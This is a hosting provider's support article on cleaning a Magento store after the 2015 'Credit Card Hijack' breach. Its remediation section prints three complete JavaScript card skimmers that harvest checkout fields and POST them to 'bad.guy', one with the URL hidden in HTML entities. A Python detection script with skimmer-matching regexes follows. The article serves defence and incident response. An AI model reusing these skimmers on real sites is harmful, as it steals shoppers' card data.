How to protect your Magento store from the Credit Card Hijack exploit

Overview
This article explains how Magento store administrators can address the Credit Card Hijack security breach by applying the latest patches and performing other critical tasks.

Background

First made known to the public in November 2015, the Credit Card Hijack exploit represents a significant Magento security breach. Using this exploit, attackers inject malicious code into the web browsers of your site’s visitors, allowing them to intercept credit card data.

Solution

Attention: In addition to the actions below, we strongly recommend that you enlist the services of a Magento developer or security specialist to audit your code.

Take the following actions to safeguard the security of your store and your customers’ data.

1: Apply the latest patch

A store running anything other than the most current version is not secure, and the general reluctance of many Magento administrators to stay current contributed to the success of this and other exploits.

Take the following steps:

  1. Identify the most current version by visiting the security center page of the Magento website.

  2. Visit magereport.com to scan your store and identify your store’s version. If it matches the current version, skip to the "2: Review and secure admin users" section. Otherwise, proceed to Step 3.

  3. Patch your store. See How to patch your Magento store for more information.

2: Review and secure admin users

Use the following procedure to audit and secure your admin users.

  1. From the Admin Panel, select System > Permissions > Roles (Figure 1).


    Figure 1. Magento Admin Panel; System > Permissions > Roles.

  2. Remove all accounts not in use, then set new, strong passwords for your remaining admin accounts. See How to create a secure password for more information.

3: Identify and remove unknown scripts

  1. From the Admin Panel, select System > Configuration (Figure 2).


    Figure 2. Magento Admin Panel; System > Configuration.

  2. From the Configuration menu, select General > Design (Figure 3).


    Figure 3. Configuration menu; General > Design.

  3. From the Design menu, click HTML Head and Footer (Figure 4).


    Figure 4. Design menu; HTML Head and Footer selections.

  4. If the Miscellaneous Scripts and Miscellaneous HTML fields are empty, proceed to the next section. Otherwise, continue to Step 5.

  5. If the Miscellaneous Scripts and Miscellaneous HTML fields are not empty, ask your developer to search for code similar to the following examples of the Credit Card Hijack exploit’s malicious code:

    <script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")||
    (document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll
    ("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html
    ("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),
    u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script>
    <script>
    var snd = null;

    // Only activates on the one-page checkout.
    window.onload = function () {
        if ((new RegExp('onepage')).test(window.location)) {
            send();
        }
    };

    // Copies every filled-in form field into the snd string.
    function clk() {
        var inp = document.querySelectorAll("input, select, textarea, checkbox");
        for (var i = 0; i < inp.length; i++) {
            if (inp[i].value.length > 0) {
                var nme = inp[i].name;
                if (nme == '') { nme = i; }
                snd += inp[i].name + '=' + inp[i].value + '&';
            }
        }
    }

    // Hooks clicks and form submissions, posts whatever was collected
    // (flagged if it contains a 13-16 digit number) and reschedules itself.
    function send() {
        var btn = document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
        for (var i = 0; i < btn.length; i++) {
            var b = btn[i];
            if (b.type != 'text' && b.type != 'select' && b.type != 'checkbox' && b.type != 'password' && b.type != 'radio') {
                if (b.addEventListener) {
                    b.addEventListener("click", clk, false);
                } else {
                    b.attachEvent('onclick', clk);
                }
            }
        }

        var frm = document.querySelectorAll("form");
        for (var i = 0; i < frm.length; i++) {
            if (frm[i].addEventListener) {
                frm[i].addEventListener("submit", clk, false);
            } else {
                frm[i].attachEvent('onsubmit', clk);
            }
        }

        if (snd != null) {
            console.clear();
            var cc = new RegExp("[0-9]{13,16}");
            var asd = "0";
            if (cc.test(snd)) {
                asd = "1";
            }
            var http = new XMLHttpRequest();
            http.open("POST", "https://bad.guy/jquery.php", true);
            http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            http.send("data=" + snd + "&asd=" + asd + "&id_id=ano.nym");
            console.clear();
        }
        snd = null;
        setTimeout('send()', 150);
    }
    </script>
    <script>
    function jj(e) {
        var t = "; " + document.cookie,
            o = t.split("; " + e + "=");
        return 2 == o.length ? o.pop().split(";").shift() : void 0
    }
    jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()),
    jQuery(function (e) {
        e("button").on("click", function () {
            var t = "",
                o = "post",
                n = window.location;
            if (new RegExp("onepage|checkout").test(n)) {
                for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++)
                    if (c[i].value.length > 0) {
                        var a = c[i].name;
                        "" == a && (a = i),
                        t += a + "=" + c[i].value + "&"
                    }
                if (t) {
                    var l = new RegExp("[0-9]{13,16}"),
                        u = new XMLHttpRequest;
                    u.open(o, e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#97;&#100;&#46;&#103;&#117;&#121;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#112;&#104;&#112; ").text(), !0),
                    u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"),
                    u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID")),
                    console.clear()
                }
            }
        })
    });
    </script>
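To support the search in Step 5, the following is an added example (not part of this article, and not Magento or Nexcess code) that checks the two stored configuration values behind the Miscellaneous Scripts and Miscellaneous HTML fields for the traits the samples above share, and decodes the HTML-entity string that hides the exfiltration URL. The config paths design/head/includes and design/footer/absolute_footer are assumed from Magento 1, and the sample rows are constructed.

```python
import html
import re

# Magento 1 config paths behind the "Miscellaneous Scripts" and
# "Miscellaneous HTML" admin fields (assumed; verify against your store).
WATCHED_PATHS = ("design/head/includes", "design/footer/absolute_footer")

# Traits shared by the skimmer samples: checkout-page test, form
# harvesting, 13-16 digit card regex, document.cookie read, XMLHttpRequest
# POST, URL hidden in numeric HTML entities, console.clear() cover-up.
INDICATORS = {
    "checkout_page_test": re.compile(r"onepage\|checkout"),
    "form_harvest": re.compile(r"querySelectorAll\(\s*[\"']input"),
    "card_number_regex": re.compile(r"\[0-9\]\{13,16\}"),
    "cookie_access": re.compile(r"document\.cookie"),
    "xhr_post": re.compile(r"XMLHttpRequest"),
    "entity_encoded_string": re.compile(r"(?:&#\d{2,3};){8,}"),
    "console_clear": re.compile(r"console\.clear\(\)"),
}

def decode_entities(value):
    """Unescape numeric HTML entities so an obfuscated URL becomes readable."""
    return html.unescape(value)

def find_indicators(value):
    """Return the sorted names of skimmer traits present in one config value."""
    decoded = decode_entities(value)
    return sorted(name for name, rx in INDICATORS.items()
                  if rx.search(value) or rx.search(decoded))

def scan_config(rows):
    """rows: (path, value) pairs as read from core_config_data; returns {path: hits}."""
    findings = {}
    for path, value in rows:
        if path in WATCHED_PATHS and value:
            hits = find_indicators(value)
            if hits:
                findings[path] = hits
    return findings

# Constructed sample rows: one benign include and one skimmer-style footer.
SAMPLE_ROWS = [
    ("design/head/includes",
     '<script type="text/javascript" src="/js/custom/tracking.js"></script>'),
    ("design/footer/absolute_footer",
     '<script>var u=new XMLHttpRequest;if(new RegExp("onepage|checkout")'
     '.test(location)){var l=new RegExp("[0-9]{13,16}");u.open("post",'
     '$("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;'
     '&#98;&#97;&#100;&#46;&#103;&#117;&#121;").text(),!0);console.clear()}</script>'),
]
```

Run scan_config over every row of core_config_data, not just the two watched paths, if you also want to catch scripts stored in CMS blocks or other design fields.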

4: Keep your store secure by following best practices

Attackers are constantly refining and honing their methods. To help secure your store against future exploits and attacks, follow the guidelines provided in How to improve the security of your Magento store.


For 24-hour assistance any day of the year, contact our Support Team by email or through the Client Portal.
